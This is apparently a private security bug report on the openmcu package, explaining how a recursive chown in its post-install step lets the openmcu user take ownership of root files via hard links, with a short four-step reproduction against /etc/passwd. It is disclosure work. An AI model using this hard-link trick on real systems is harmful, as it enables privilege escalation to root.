The openmcu ebuild calls "chown -R" on the live root filesystem in pkg_postinst: pkg_postinst() { einfo "Setting permissions..." chown -R openmcu:openmcu "${ROOT}"etc/openmcu ... This can be exploited by the "openmcu" user to gain root if he places a hard link to a root-owned file in one of those directories. The next time the package is upgraded or reinstalled, the "chown -R" will give root's file to the "openmcu" user. For example, 1. emerge openmcu 2. su -s /bin/sh -c 'ln /etc/passwd /etc/openmcu/x' openmcu 3. emerge openmcu 4. /etc/passwd is owned by openmcu:openmcu I'm marking this private, but the package is maintainer-needed, to security@ will need to CC someone appropriate to fix it.
The package has been removed.